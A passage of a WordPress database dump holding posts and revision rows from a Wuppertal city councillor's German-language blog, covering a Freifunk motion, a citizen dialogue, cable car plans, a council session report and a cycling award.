12:00:43','',0,'http://www.ollital.de/wordpress/?p=142',0,'post','',0),(143,2,'2015-05-05 14:00:08','2015-05-05 12:00:08','Der Ältestenrat hat heute beschlossen, unseren Freifunkantrag VO/1335/15\r\nzu vertagen, so dass er nicht im Rat am 11.05.2015 behandelt wird, sondern zunächst in die Auschusssitzung Stadtentwicklung am 11.06.2015 eingebracht wird. Dort bin ich ja auch vertreten und kann den Antrag auch im Ausschuss begleiten. Im Rat wird der Antrag voraussichtlich am 22.06. behandelt.\r\nIch kann schlecht einschätzen, ob das gut oder schlecht für den Antrag ist, aber ich denke, ich kann auf diese Weise ein bißchen mehr Basisinformationen zu Freifunk in die Menge streuen.\r\n','Freifunkantrag wird vertagt','','inherit','open','open','','142-revision-v1','','','2015-05-05 14:00:08','2015-05-05 12:00:08','',142,'http://www.ollital.de/wordpress/index.php/2015/05/142-revision-v1/',0,'revision','',0),(144,2,'2015-05-05 14:00:43','2015-05-05 12:00:43','Der Ältestenrat hat heute beschlossen, unseren Freifunkantrag VO/1335/15\r\nzu vertagen, so dass er nicht im Rat am 11.05.2015 behandelt wird, sondern zunächst in die Auschusssitzung Stadtentwicklung am 11.06.2015 eingebracht wird. Dort bin ich ja auch vertreten und kann den Antrag auch im Ausschuss begleiten. Im Rat wird der Antrag voraussichtlich am 22.06. diskutiert.\r\nIch kann schlecht einschätzen, ob das gut oder schlecht für den Antrag ist, aber ich denke, ich kann auf diese Weise ein bißchen mehr Basisinformationen zu Freifunk in die Menge streuen.\r\n','Freifunkantrag wird vertagt','','inherit','open','open','','142-revision-v1','','','2015-05-05 14:00:43','2015-05-05 12:00:43','',142,'http://www.ollital.de/wordpress/index.php/2015/05/142-revision-v1/',0,'revision','',0),(145,2,'2015-05-06 08:01:47','2015-05-06 06:01:47','Olli Graf, Wuppertaler aus Überzeugung.\nJahrgang 1969\nDipl. Inform. (FH)\nPirat\nStadtverordneter im Rat der Stadt Wuppertal\nAuschuss für Stadtentwicklung, Wirtschaft und Bauen\nBetriebsa\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat #talrat\n','Über mich','','inherit','open','open','','74-autosave-v1','','','2015-05-06 08:01:47','2015-05-06 06:01:47','',74,'http://www.ollital.de/wordpress/index.php/2015/05/74-autosave-v1/',0,'revision','',0),(146,2,'2015-05-06 08:02:07','2015-05-06 06:02:07','Olli Graf, Wuppertaler aus Überzeugung.\r\nJahrgang 1969\r\nDipl. Inform. (FH)\r\nPirat\r\nStadtverordneter im Rat der Stadt Wuppertal\r\nAuschuss für Stadtentwicklung, Wirtschaft und Bauen\r\nBetriebsauschuss Gebäudemanagement Wuppertal\r\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat #talrat\r\n','Über mich','','inherit','open','open','','74-revision-v1','','','2015-05-06 08:02:07','2015-05-06 06:02:07','',74,'http://www.ollital.de/wordpress/index.php/2015/05/74-revision-v1/',0,'revision','',0),(147,2,'2015-05-06 08:03:39','2015-05-06 06:03:39','Was ich als Stadtverordneter erlebe und denke, will ich hier festhalten.\r\n','Politik in Wuppertal','','inherit','open','open','','2-revision-v1','','','2015-05-06 08:03:39','2015-05-06 06:03:39','',2,'http://www.ollital.de/wordpress/index.php/2015/05/2-revision-v1/',0,'revision','',0),(148,2,'2015-05-06 21:52:36','2015-05-06 19:52:36','Heute abend trafen sich schätzungsweise 80 bis 85 Mitmacher zum Bürgerdialog im Ratssaal.\r\nFolgende Themen wurden heute in Workshops bearbeitet:\r\n\r\n
                                                                  \r\n
                                                                • Städtische Unterstützung des \"Bürgerengagement\".
                                                                • \r\n
                                                                • Transparenz in der Kommune.
                                                                • \r\n
                                                                • Digitale Bürgerbeteiligung.
                                                                • \r\n
                                                                • Bürgerengagement im Quartier.
                                                                • \r\n
                                                                • Transparente Stadt.
                                                                • \r\n
                                                                \r\nAb sofort kann jeder Vorschläge für den Kandidaten 3.0 abgeben\r\n\r\nDer Sieger wird dann am 21.05. um 18:00 Uhr bekannt gegeben.\r\n','Fünftes Treffen Wuppertal 3.0 ','','publish','open','open','','funftes-treffen-wuppertal-3-0','','','2015-07-05 22:07:39','2015-07-05 20:07:39','',0,'http://www.ollital.de/wordpress/?p=148',0,'post','',0),(149,2,'2015-05-06 20:49:39','2015-05-06 18:49:39','Städtische Unterstützung des \"Bürgerengagement\"\r\nTransparenz\r\nDigitale Bürgerbeteiligung\r\nBürgerengagement im Quartier\r\n\r\n','','','inherit','open','open','','148-revision-v1','','','2015-05-06 20:49:39','2015-05-06 18:49:39','',148,'http://www.ollital.de/wordpress/index.php/2015/05/148-revision-v1/',0,'revision','',0),(150,2,'2015-05-06 20:56:56','2015-05-06 18:56:56','Städtische Unterstützung des \"Bürgerengagement\"\r\nTransparenz in der Kommune\r\nDigitale Bürgerbeteiligung\r\nBürgerengagement im Quartier\r\n\r\n','','','inherit','open','open','','148-revision-v1','','','2015-05-06 20:56:56','2015-05-06 18:56:56','',148,'http://www.ollital.de/wordpress/index.php/2015/05/148-revision-v1/',0,'revision','',0),(151,2,'2015-05-06 21:01:24','2015-05-06 19:01:24','Städtische Unterstützung des \"Bürgerengagement\"\r\nTransparenz in der Kommune\r\nDigitale Bürgerbeteiligung\r\nBürgerengagement im Quartier\r\nTransparente Stadt\r\n\r\n','','','inherit','open','open','','148-revision-v1','','','2015-05-06 21:01:24','2015-05-06 19:01:24','',148,'http://www.ollital.de/wordpress/index.php/2015/05/148-revision-v1/',0,'revision','',0),(152,2,'2015-05-06 21:04:07','2015-05-06 19:04:07','Städtische Unterstützung des \"Bürgerengagement\"\r\nTransparenz in der Kommune\r\nDigitale Bürgerbeteiligung\r\nBürgerengagement im Quartier\r\nTransparente Stadt\r\n\r\nKandidatenvorschläge über www.wuppertal.drei-null.de\r\n\r\n','','','inherit','open','open','','148-revision-v1','','','2015-05-06 21:04:07','2015-05-06 19:04:07','',148,'http://www.ollital.de/wordpress/index.php/2015/05/148-revision-v1/',0,'revision','',0),(153,2,'2015-05-06 21:52:21','2015-05-06 19:52:21','Heute abend trafen sich schätzungsweise 80 bis 85 Mitmacher zum Bürgerdialog im Ratssaal.\r\nFolgende Themen wurden heute in Workshops bearbeitet:\r\n\r\n
                                                                  \r\n
                                                                • Städtische Unterstützung des \"Bürgerengagement\"
                                                                • \r\n
                                                                • Transparenz in der Kommune
                                                                • \r\n
                                                                • Digitale Bürgerbeteiligung
                                                                • \r\n
                                                                • Bürgerengagement im Quartier
                                                                • \r\n
                                                                • Transparente Stadt
                                                                • \r\n\r\nAb sofort kann jeder Vorschläge für den Kandidaten 3.0 abgeben\r\n\r\nDer Sieger wird dann am 21.05. um 18:00 Uhr bekannt gegeben.\r\n
                                                                ','Fünftes Treffen Wuppertal 3.0 ','','inherit','open','open','','148-revision-v1','','','2015-05-06 21:52:21','2015-05-06 19:52:21','',148,'http://www.ollital.de/wordpress/index.php/2015/05/148-revision-v1/',0,'revision','',0),(154,2,'2015-05-07 07:28:00','2015-05-07 05:28:00','Heute abend trafen sich schätzungsweise 80 bis 85 Mitmacher zum Bürgerdialog im Ratssaal.\r\nFolgende Themen wurden heute in Workshops bearbeitet:\r\n\r\n
                                                                  \r\n
                                                                • Städtische Unterstützung des \"Bürgerengagement\".
                                                                • \r\n
                                                                • Transparenz in der Kommune.
                                                                • \r\n
                                                                • Digitale Bürgerbeteiligung.
                                                                • \r\n
                                                                • Bürgerengagement im Quartier.
                                                                • \r\n
                                                                • Transparente Stadt.
                                                                • \r\n\r\nAb sofort kann jeder Vorschläge für den Kandidaten 3.0 abgeben\r\n\r\nDer Sieger wird dann am 21.05. um 18:00 Uhr bekannt gegeben.\r\n
                                                                ','Fünftes Treffen Wuppertal 3.0 ','','inherit','open','open','','148-revision-v1','','','2015-05-07 07:28:00','2015-05-07 05:28:00','',148,'http://www.ollital.de/wordpress/index.php/2015/05/148-revision-v1/',0,'revision','',0),(156,2,'2015-05-07 11:44:27','2015-05-07 09:44:27','Heute abend trafen sich schätzungsweise 80 bis 85 Mitmacher zum Bürgerdialog im Ratssaal.\r\nFolgende Themen wurden heute in Workshops bearbeitet:\r\n\r\n
                                                                  \r\n
                                                                • Städtische Unterstützung des \"Bürgerengagement\".
                                                                • \r\n
                                                                • Transparenz in der Kommune.
                                                                • \r\n
                                                                • Digitale Bürgerbeteiligung.
                                                                • \r\n
                                                                • Bürgerengagement im Quartier.
                                                                • \r\n
                                                                • Transparente Stadt.
                                                                • \r\n
                                                                \r\nAb sofort kann jeder Vorschläge für den Kandidaten 3.0 abgeben\r\n\r\nDer Sieger wird dann am 21.05. um 18:00 Uhr bekannt gegeben.\r\n','Fünftes Treffen Wuppertal 3.0 ','','inherit','open','open','','148-revision-v1','','','2015-05-07 11:44:27','2015-05-07 09:44:27','',148,'http://www.ollital.de/wordpress/index.php/2015/05/148-revision-v1/',0,'revision','',0),(157,2,'2015-05-07 22:24:21','2015-05-07 20:24:21','Die Idee geistert schon länger durch die Gremien und heute hat die WSW ihre Machbarkeitsstudie zu einer Seilbahn auf der Strecke Hauptbahnhof - Universität - Schulzentrum Süd vorgestellt.\r\nIch halte diese Idee für sehr zukunftsweisend für Wuppertal. Auch wenn die WSW die Wuppertaler Bürger einbeziehen wollen, fordere ich einen ergebnisoffenen Dialog mit allen Beteiligten und vor allem den Eigentümern der betroffenen Grundstücke entlang der geplanten Trasse.\r\nSeilbahn 2025','Seilbahnpläne','','publish','open','open','','seilbahnplane','','','2015-05-07 22:46:41','2015-05-07 20:46:41','',0,'http://www.ollital.de/wordpress/?p=157',0,'post','',0),(158,2,'2015-05-08 12:14:32','2015-05-08 10:14:32','Die Idee geistert schon länger durch die Gremien und heute hat die WSW ihre Machbarkeitsstudie zu einer Seilbahn auf der Strecke Hauptbahnhof - Universität - Schulzentrum Süd vorgestellt.\nIch halte diese Idee für sehr zukunftsweisend für Wuppertal. Auch wenn die WSW die Wuppertaler Bürger einbeziehen wollen, fordere ich einen ergebnisoffenen Dialog mit allen Beteiligten und vor allem den Eigentümern der betroffenen Grundstücke entlang der geplanten Trasse.\nSeilbahn 2025\n[maa id=\'basic\']','Seilbahnpläne','','inherit','open','open','','157-autosave-v1','','','2015-05-08 12:14:32','2015-05-08 10:14:32','',157,'http://www.ollital.de/wordpress/index.php/2015/05/157-autosave-v1/',0,'revision','',0),(159,2,'2015-05-07 22:24:21','2015-05-07 20:24:21','Die Idee geistert schon länger durch die Gremien und heute hat die WSW ihre Machbarkeitsstudie zu einer Seilbahn auf der Strecke Hauptbahnhof - Universität - Schulzentrum Süd vorgestellt.\r\nIch halte diese Idee für sehr zukunftsweisend für Wuppertal. Auch wenn die WSW die Wuppertaler Bürger einbeziehen wollen, fordere ich einen ergebnisoffenen Dialog mit allen Beteiligten und vor allem den Eigentümern der betroffenen Grundstücke entlang der geplanten Trasse.\r\n','Seilbahnpläne','','inherit','open','open','','157-revision-v1','','','2015-05-07 22:24:21','2015-05-07 20:24:21','',157,'http://www.ollital.de/wordpress/index.php/2015/05/157-revision-v1/',0,'revision','',0),(160,2,'2015-05-07 22:46:41','2015-05-07 20:46:41','Die Idee geistert schon länger durch die Gremien und heute hat die WSW ihre Machbarkeitsstudie zu einer Seilbahn auf der Strecke Hauptbahnhof - Universität - Schulzentrum Süd vorgestellt.\r\nIch halte diese Idee für sehr zukunftsweisend für Wuppertal. Auch wenn die WSW die Wuppertaler Bürger einbeziehen wollen, fordere ich einen ergebnisoffenen Dialog mit allen Beteiligten und vor allem den Eigentümern der betroffenen Grundstücke entlang der geplanten Trasse.\r\nSeilbahn 2025','Seilbahnpläne','','inherit','open','open','','157-revision-v1','','','2015-05-07 22:46:41','2015-05-07 20:46:41','',157,'http://www.ollital.de/wordpress/index.php/2015/05/157-revision-v1/',0,'revision','',0),(165,2,'2015-05-08 07:12:51','2015-05-08 05:12:51','','Home','','publish','open','closed','','home','','','2015-11-27 07:03:34','2015-11-27 06:03:34','',0,'http://www.ollital.de/wordpress/?p=165',1,'nav_menu_item','',0),(167,2,'2015-05-08 07:12:51','2015-05-08 05:12:51',' ','','','publish','open','closed','','167','','','2015-11-27 07:03:35','2015-11-27 06:03:35','',0,'http://www.ollital.de/wordpress/?p=167',2,'nav_menu_item','',0),(168,2,'2015-05-08 07:12:52','2015-05-08 05:12:52',' ','','','publish','open','closed','','168','','','2015-11-27 07:03:36','2015-11-27 06:03:36','',0,'http://www.ollital.de/wordpress/?p=168',3,'nav_menu_item','',0),(172,2,'2015-05-08 11:23:44','2015-05-08 09:23:44','{\r\n \"slotId\": \"8649444673\",\r\n \"unitType\": \"responsive\",\r\n \"resize\": \"auto\"\r\n}','AdSense','','publish','closed','closed','','adsense-2','','','2015-05-30 16:27:27','2015-05-30 14:27:27','',0,'http://www.ollital.de/wordpress/?post_type=advanced_ads&p=172',0,'advanced_ads','',0),(176,2,'2015-05-11 18:43:58','2015-05-11 16:43:58','Die heutige Ratssitzung verlief relativ unspektakulär, obwohl mit dem Standort für die Forensik ein ziemlich brisantes Thema auf der Tagesordnung stand.\r\n\r\nAuf eine Anfrage der Linken bestätigt die Verwaltung, dass die Kosten der OB Wahl im September mit 400.000€ kalkuliert wird.\r\nUnser Freifunkantrag wurde an den StaWiBau-Ausschuss verwiesen.\r\nDer Antrag der Fraktion Pro NRW/REP auf Schließung des AZ wurde mit großer Mehrheit abgelehnt.\r\nDas Gelände an der Müngstener Str. kommt für den Rat nicht als Standort für die Forensik in Frage. Stattdessen wurde beschlossen, die Verhandlungen mit der\r\nBergischen Diakonie Aprath (BDA) wieder aufzunehmen.\r\nEs entstand kontroverse Diskussion um Dezentralisierung des Einwohnermeldeamts durch Wiedereröffnung der Bürgerämter, der Antrag wurde abgelehnt, da er nicht finanzierbar ist.\r\nEin Antrag auf Beteiligung des Behindertenbeirats an den Gremien\r\n
                                                                  \r\n
                                                                • Ausschuss für Schule und Bildung
                                                                • \r\n
                                                                • Ausschuss für Stadtentwicklung, Wirtschaft und Bauen
                                                                • \r\n
                                                                • Ausschuss für Verkehr
                                                                • \r\n
                                                                • Sportausschuss
                                                                • \r\n
                                                                • Kulturausschuss
                                                                • \r\n
                                                                \r\n\r\nwurde nicht auf alle Ausschüsse erweitert. Schade, Behinderte sollten in allen Gremien repräsentiert sein, nicht nur in einigen.\r\n\r\nIch wurde jetzt als ordentliches, stimmberechtigtes Mitglied im Betriebausschuss Gebäudemanagement bestätigt.\r\n','Ratssitzung vom 11.05.','','publish','open','open','','ratssitzung-vom-11-05','','','2015-05-12 07:13:59','2015-05-12 05:13:59','',0,'http://www.ollital.de/wordpress/?p=176',0,'post','',0),(177,2,'2015-05-11 16:44:10','2015-05-11 14:44:10','Kosten der OB Wahl 400000€\r\nFreifunkantrag an StaWiBau verwiesen.\r\nAntrag auf Schließung des AZ abgelehnt.','Ratssitzung vom 11.05.','','inherit','open','open','','176-revision-v1','','','2015-05-11 16:44:10','2015-05-11 14:44:10','',176,'http://www.ollital.de/wordpress/index.php/2015/05/176-revision-v1/',0,'revision','',0),(178,2,'2015-05-11 17:36:46','2015-05-11 15:36:46','Kosten der OB Wahl 400000€\r\nFreifunkantrag an StaWiBau verwiesen.\r\nAntrag auf Schließung des AZ abgelehnt.\r\nKontroverse Diskussion um Dezentralisierung des Einwohnermeldeamts.','Ratssitzung vom 11.05.','','inherit','open','open','','176-revision-v1','','','2015-05-11 17:36:46','2015-05-11 15:36:46','',176,'http://www.ollital.de/wordpress/index.php/2015/05/176-revision-v1/',0,'revision','',0),(179,2,'2015-05-11 17:57:50','2015-05-11 15:57:50','Kosten der OB Wahl 400000€\r\nFreifunkantrag an StaWiBau verwiesen.\r\nAntrag auf Schließung des AZ abgelehnt.\r\nKontroverse Diskussion um Dezentralisierung des Einwohnermeldeamts.\r\nBeteiligung des Behindertenbeirats an bestimmten Ausschüssen.','Ratssitzung vom 11.05.','','inherit','open','open','','176-revision-v1','','','2015-05-11 17:57:50','2015-05-11 15:57:50','',176,'http://www.ollital.de/wordpress/index.php/2015/05/176-revision-v1/',0,'revision','',0),(180,2,'2015-05-11 18:42:38','2015-05-11 16:42:38','Die heutige Ratssitzung verlief relativ unspektakulär, obwohl mit dem Standort für die Forensik ein ziemlich brisantes Thema auf der Tagesordnung stand.\r\n\r\nEiner Anfrage der Linken bestätigt die Verwaltung, dass die Kosten der OB Wahl im September mit 400.000€ kalkuliert wird.\r\nUnser Freifunkantrag wurde an den StaWiBau-Ausschuss verwiesen.\r\nDer Antrag der Fraktion Pro NRW/REP auf Schließung des AZ wurde mit großer Mehrheit abgelehnt.\r\nEs entstand kontroverse Diskussion um Dezentralisierung des Einwohnermeldeamts durch Wiedereröffnung der Bürgerämter, der Antrag wurde abgelehnt, da er nicht finanzierbar ist.\r\nEin Antrag auf Beteiligung Beteiligung des Behindertenbeirats an den Gremien\r\n
                                                                  \r\n
                                                                • Ausschuss für Schule und Bildung
                                                                • \r\n
                                                                • Ausschuss für Stadtentwicklung, Wirtschaft und Bauen
                                                                • \r\n
                                                                • Ausschuss für Verkehr
                                                                • \r\n
                                                                • Sportausschuss
                                                                • \r\n
                                                                • Kulturausschuss
                                                                • \r\n
                                                                \r\n\r\nwurde nicht auf alle Ausschüsse erweitert. Schade.\r\n','Ratssitzung vom 11.05.','','inherit','open','open','','176-revision-v1','','','2015-05-11 18:42:38','2015-05-11 16:42:38','',176,'http://www.ollital.de/wordpress/index.php/2015/05/176-revision-v1/',0,'revision','',0),(181,2,'2015-05-11 18:45:14','2015-05-11 16:45:14','Die heutige Ratssitzung verlief relativ unspektakulär, obwohl mit dem Standort für die Forensik ein ziemlich brisantes Thema auf der Tagesordnung stand.\r\n\r\nEiner Anfrage der Linken bestätigt die Verwaltung, dass die Kosten der OB Wahl im September mit 400.000€ kalkuliert wird.\r\nUnser Freifunkantrag wurde an den StaWiBau-Ausschuss verwiesen.\r\nDer Antrag der Fraktion Pro NRW/REP auf Schließung des AZ wurde mit großer Mehrheit abgelehnt.\r\nEs entstand kontroverse Diskussion um Dezentralisierung des Einwohnermeldeamts durch Wiedereröffnung der Bürgerämter, der Antrag wurde abgelehnt, da er nicht finanzierbar ist.\r\nEin Antrag auf Beteiligung Beteiligung des Behindertenbeirats an den Gremien\r\n
                                                                  \r\n
                                                                • Ausschuss für Schule und Bildung
                                                                • \r\n
                                                                • Ausschuss für Stadtentwicklung, Wirtschaft und Bauen
                                                                • \r\n
                                                                • Ausschuss für Verkehr
                                                                • \r\n
                                                                • Sportausschuss
                                                                • \r\n
                                                                • Kulturausschuss
                                                                • \r\n
                                                                \r\n\r\nwurde nicht auf alle Ausschüsse erweitert. Schade.\r\n\r\nIch wurde jetzt als ordentliches, stimmberechtigtes Mitglied im Betriebausschuss Gebäudemanagement bestätigt.\r\n','Ratssitzung vom 11.05.','','inherit','open','open','','176-revision-v1','','','2015-05-11 18:45:14','2015-05-11 16:45:14','',176,'http://www.ollital.de/wordpress/index.php/2015/05/176-revision-v1/',0,'revision','',0),(182,2,'2015-05-12 07:13:23','2015-05-12 05:13:23','Die heutige Ratssitzung verlief relativ unspektakulär, obwohl mit dem Standort für die Forensik ein ziemlich brisantes Thema auf der Tagesordnung stand.\n\nEiner Anfrage der Linken bestätigt die Verwaltung, dass die Kosten der OB Wahl im September mit 400.000€ kalkuliert wird.\nUnser Freifunkantrag wurde an den StaWiBau-Ausschuss verwiesen.\nDer Antrag der Fraktion Pro NRW/REP auf Schließung des AZ wurde mit großer Mehrheit abgelehnt.\nDas Gelände an der Müngstener Str. kommt für den Rat nicht als Standort für die Forensik in Frage. Stattdessen wurde beschlossen, die Verhandlungen mit der\nBergischen Diakonie Aprath (BDA) wieder aufzunehmen.\nEs entstand kontroverse Diskussion um Dezentralisierung des Einwohnermeldeamts durch Wiedereröffnung der Bürgerämter, der Antrag wurde abgelehnt, da er nicht finanzierbar ist.\nEin Antrag auf Beteiligung des Behindertenbeirats an den Gremien\n
                                                                  \n
                                                                • Ausschuss für Schule und Bildung
                                                                • \n
                                                                • Ausschuss für Stadtentwicklung, Wirtschaft und Bauen
                                                                • \n
                                                                • Ausschuss für Verkehr
                                                                • \n
                                                                • Sportausschuss
                                                                • \n
                                                                • Kulturausschuss
                                                                • \n
                                                                \n\nwurde nicht auf alle Ausschüsse erweitert. Schade, Behinderte sollten in allen Gremien repräsentiert sein, n.\n\nIch wurde jetzt als ordentliches, stimmberechtigtes Mitglied im Betriebausschuss Gebäudemanagement bestätigt.\n','Ratssitzung vom 11.05.','','inherit','open','open','','176-autosave-v1','','','2015-05-12 07:13:23','2015-05-12 05:13:23','',176,'http://www.ollital.de/wordpress/index.php/2015/05/176-autosave-v1/',0,'revision','',0),(183,2,'2015-05-12 07:12:22','2015-05-12 05:12:22','Die heutige Ratssitzung verlief relativ unspektakulär, obwohl mit dem Standort für die Forensik ein ziemlich brisantes Thema auf der Tagesordnung stand.\r\n\r\nEiner Anfrage der Linken bestätigt die Verwaltung, dass die Kosten der OB Wahl im September mit 400.000€ kalkuliert wird.\r\nUnser Freifunkantrag wurde an den StaWiBau-Ausschuss verwiesen.\r\nDer Antrag der Fraktion Pro NRW/REP auf Schließung des AZ wurde mit großer Mehrheit abgelehnt.\r\nDas Gelände an der Müngstener Str. kommt für den Rat nicht als Standort für die Forensik in Frage. Stattdessen wurde beschlossen, die Verhandlungen mit der\r\nBergischen Diakonie Aprath (BDA) wieder aufzunehmen.\r\nEs entstand kontroverse Diskussion um Dezentralisierung des Einwohnermeldeamts durch Wiedereröffnung der Bürgerämter, der Antrag wurde abgelehnt, da er nicht finanzierbar ist.\r\nEin Antrag auf Beteiligung Beteiligung des Behindertenbeirats an den Gremien\r\n
                                                                  \r\n
                                                                • Ausschuss für Schule und Bildung
                                                                • \r\n
                                                                • Ausschuss für Stadtentwicklung, Wirtschaft und Bauen
                                                                • \r\n
                                                                • Ausschuss für Verkehr
                                                                • \r\n
                                                                • Sportausschuss
                                                                • \r\n
                                                                • Kulturausschuss
                                                                • \r\n
                                                                \r\n\r\nwurde nicht auf alle Ausschüsse erweitert. Schade.\r\n\r\nIch wurde jetzt als ordentliches, stimmberechtigtes Mitglied im Betriebausschuss Gebäudemanagement bestätigt.\r\n','Ratssitzung vom 11.05.','','inherit','open','open','','176-revision-v1','','','2015-05-12 07:12:22','2015-05-12 05:12:22','',176,'http://www.ollital.de/wordpress/index.php/2015/05/176-revision-v1/',0,'revision','',0),(184,2,'2015-05-12 07:13:33','2015-05-12 05:13:33','Die heutige Ratssitzung verlief relativ unspektakulär, obwohl mit dem Standort für die Forensik ein ziemlich brisantes Thema auf der Tagesordnung stand.\r\n\r\nEiner Anfrage der Linken bestätigt die Verwaltung, dass die Kosten der OB Wahl im September mit 400.000€ kalkuliert wird.\r\nUnser Freifunkantrag wurde an den StaWiBau-Ausschuss verwiesen.\r\nDer Antrag der Fraktion Pro NRW/REP auf Schließung des AZ wurde mit großer Mehrheit abgelehnt.\r\nDas Gelände an der Müngstener Str. kommt für den Rat nicht als Standort für die Forensik in Frage. Stattdessen wurde beschlossen, die Verhandlungen mit der\r\nBergischen Diakonie Aprath (BDA) wieder aufzunehmen.\r\nEs entstand kontroverse Diskussion um Dezentralisierung des Einwohnermeldeamts durch Wiedereröffnung der Bürgerämter, der Antrag wurde abgelehnt, da er nicht finanzierbar ist.\r\nEin Antrag auf Beteiligung des Behindertenbeirats an den Gremien\r\n
                                                                  \r\n
                                                                • Ausschuss für Schule und Bildung
                                                                • \r\n
                                                                • Ausschuss für Stadtentwicklung, Wirtschaft und Bauen
                                                                • \r\n
                                                                • Ausschuss für Verkehr
                                                                • \r\n
                                                                • Sportausschuss
                                                                • \r\n
                                                                • Kulturausschuss
                                                                • \r\n
                                                                \r\n\r\nwurde nicht auf alle Ausschüsse erweitert. Schade, Behinderte sollten in allen Gremien repräsentiert sein, nicht nur in einigen.\r\n\r\nIch wurde jetzt als ordentliches, stimmberechtigtes Mitglied im Betriebausschuss Gebäudemanagement bestätigt.\r\n','Ratssitzung vom 11.05.','','inherit','open','open','','176-revision-v1','','','2015-05-12 07:13:33','2015-05-12 05:13:33','',176,'http://www.ollital.de/wordpress/index.php/2015/05/176-revision-v1/',0,'revision','',0),(185,2,'2015-05-12 07:13:59','2015-05-12 05:13:59','Die heutige Ratssitzung verlief relativ unspektakulär, obwohl mit dem Standort für die Forensik ein ziemlich brisantes Thema auf der Tagesordnung stand.\r\n\r\nAuf eine Anfrage der Linken bestätigt die Verwaltung, dass die Kosten der OB Wahl im September mit 400.000€ kalkuliert wird.\r\nUnser Freifunkantrag wurde an den StaWiBau-Ausschuss verwiesen.\r\nDer Antrag der Fraktion Pro NRW/REP auf Schließung des AZ wurde mit großer Mehrheit abgelehnt.\r\nDas Gelände an der Müngstener Str. kommt für den Rat nicht als Standort für die Forensik in Frage. Stattdessen wurde beschlossen, die Verhandlungen mit der\r\nBergischen Diakonie Aprath (BDA) wieder aufzunehmen.\r\nEs entstand kontroverse Diskussion um Dezentralisierung des Einwohnermeldeamts durch Wiedereröffnung der Bürgerämter, der Antrag wurde abgelehnt, da er nicht finanzierbar ist.\r\nEin Antrag auf Beteiligung des Behindertenbeirats an den Gremien\r\n
                                                                  \r\n
                                                                • Ausschuss für Schule und Bildung
                                                                • \r\n
                                                                • Ausschuss für Stadtentwicklung, Wirtschaft und Bauen
                                                                • \r\n
                                                                • Ausschuss für Verkehr
                                                                • \r\n
                                                                • Sportausschuss
                                                                • \r\n
                                                                • Kulturausschuss
                                                                • \r\n
                                                                \r\n\r\nwurde nicht auf alle Ausschüsse erweitert. Schade, Behinderte sollten in allen Gremien repräsentiert sein, nicht nur in einigen.\r\n\r\nIch wurde jetzt als ordentliches, stimmberechtigtes Mitglied im Betriebausschuss Gebäudemanagement bestätigt.\r\n','Ratssitzung vom 11.05.','','inherit','open','open','','176-revision-v1','','','2015-05-12 07:13:59','2015-05-12 05:13:59','',176,'http://www.ollital.de/wordpress/index.php/2015/05/176-revision-v1/',0,'revision','',0),(187,2,'2015-05-19 07:05:01','2015-05-19 05:05:01','In der Kategorie \"Infrastruktur\" wurde die Nordbahntrasse gestern (18.05.2015) mit dem deutschen Fahrradpreis ausgezeichnet. Auf dem nationalen Fahrradkongress in Potsdam wurde der mit 300 EUR dotierte Preis von Staatssekratär Rainer Bomba übergeben. Verkehrsminister Michael Groschek bezeichnete die Trasse als Blaupause für Radschnellwege und lobte die zügige Akzeptanz des neuen Verkehrsweges durch die Wuppertaler Bevölkerung. Sie habe das Mobilitätsverhalten der Wuppertaler in kürzester Zeit veränderet.\r\nMein Glückwunsch an alle, die an der Idee, Planung und Umsetzung des Projekts beteiligt waren.','Nordbahntrasse ausgezeichnet','','publish','open','open','','nordbahntrasse-ausgezeichnet','','','2015-05-19 07:05:01','2015-05-19 05:05:01','',0,'http://www.ollital.de/wordpress/?p=187',0,'post','',0),(188,2,'2015-05-19 07:05:01','2015-05-19 05:05:01','In der Kategorie \"Infrastruktur\" wurde die Nordbahntrasse gestern (18.05.2015) mit dem deutschen Fahrradpreis ausgezeichnet. Auf dem nationalen Fahrradkongress in Potsdam wurde der mit 300 EUR dotierte Preis von Staatssekratär Rainer Bomba übergeben. Verkehrsminister Michael Groschek bezeichnete die Trasse als Blaupause für Radschnellwege und lobte die zügige Akzeptanz des neuen Verkehrsweges durch die Wuppertaler Bevölkerung. Sie habe das Mobilitätsverhalten der Wuppertaler in kürzester Zeit veränderet.\r\nMein Glückwunsch an alle, die an der Idee, Planung und Umsetzung des Projekts beteiligt waren.','Nordbahntrasse ausgezeichnet','','inherit','open','open','','187-revision-v1','','','2015-05-19 07:05:01','2015-05-19 05:05:01','',187,'http://www.ollital.de/wordpress/index.php/2015/05/187-revision-v1/',0,'revision','',0),(189,2,'2015-05-19 21:53:32','2015-05-19 19:53:32','\"Seilbahninfo\"Die Mensa der Bergischen Universität hatte man als Kulisse für die Auftaktveranstaltung zur Informationsreihe zu den Seilbahnplänen gewählt.\r\nIch schätze, es waren ca. 200 bis 250 Menschen anwesend (ich tu mich mit solchen Schätzungen allerdings etwas schwer). Dabei waren sowohl Studenten,\r\nBetroffene (Grundstückseigentümer und Anwohner an dem geplanten Trassenverlauf) als auch einfach Wuppertaler Bürger vertreten, die alle ihre Fragen\r\nund Bedenken zu dem Projekt vortragen wollten. Herr Jäger von WSW mobil stellte zunächst klar, dass es sich momentan um eine Vorstudie zur Machbarkeitsstudie handelt.\r\nDie Planungen gehen von einer Dreiseilumlaufbahn mit einer Länge von 2800m aus. Dabei soll über 6 Stützen mit einer Höhe von bis zu 70m eine Höhendifferenz von 165m überwunden werden.\r\nInsgesamt gibt es drei Stationen (Hauptbahnhof, Uni und Schulzentrum Süd, wo auch der Antrieb installiert werden wird)\r\nSoviel zur Technik.\r\nDie Seilbahn wird \"integraler Bestandteil des ÖPNV sein und mit allen VRR-Tickets benutzbar sein.Im Gegenzug verspricht sich die WSW eine Ausdünnung der Buslinien, die momentan zur Uni und zum Schulzentrum Süd fahren. Hier sehe ich, wie auch angemerkt wurde, kritisch, dass die Menschen, die zwischendurch aus diesen Bussen ein-/und aussteigen, einen Teil ihrer Mobilität verlieren.\r\nIn einem sehr ausführlichen Frageblock konnte jeder sein Anliegen vorbringen. Die Grundstückseigentümer hatte wie erwartet vor allem die Sorge um den Wertverlust ihrer Immobilien,\r\nDie Anwohner sorgten sich um ihre Privatsphäre, den Lärm und Dreck, der ggf. aus den Kabinen herausgeworfen werden könnte.\r\nHerr Jäger ließ keine Frage unbeantwortet, so dass hier scheinbar aus den Fehlern um den Verkauf des Carnaper Platzes gelernt wurde und die Bürger wirklich frühzeitig in die Pläne\r\nmit einbezogen wird. Zitat: \"Ihre Ängste werden ernst genommen.\"\r\nIch merke aber kritisch an, dass hier die Baukosten so berechnet 